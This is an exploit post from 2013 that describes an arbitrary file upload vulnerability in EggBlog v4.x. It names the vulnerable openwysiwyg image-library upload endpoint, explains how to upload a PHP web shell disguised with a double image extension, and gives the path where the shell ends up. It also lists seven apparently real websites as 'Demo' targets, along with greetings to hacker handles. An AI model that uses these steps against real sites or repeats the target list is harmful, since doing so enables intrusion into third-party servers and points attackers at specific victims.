facebook facebook twitter rss

EggBlog v4.X.X Arbitrary File Upload vulnerability

Author: TUNISIAN CYBER , Published: 13-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: EggBlog v4.X.X Arbitrary File Upload vulnerability
[+] Date: 13-12-2013
[+] Category: WebApp
[+] Vendor:http://sourceforge.net/projects/eggblog/
[+] Google Dork: Do Some Work and you'll find it :)
[+] Tested on: Win7 , ubuntu 13.04


########################################################################################

Site.ltd/[PaTh]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
Upload h4x3d.php.jpg/gif/png
Shell Path:
site.ltd/[PaTh]/photos/uploads/h4x3d.php.jpg

Demo:
www.thehenryvi.com/news
www.cn-blue.com
www.alrecenk.com/eggblog
sweetlyunique.net/blog
fucopuredietpills.com/eggblog/
www.mrcromwellsattic.com/blog/
elkarius.free.fr
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt

Like us on Facebook :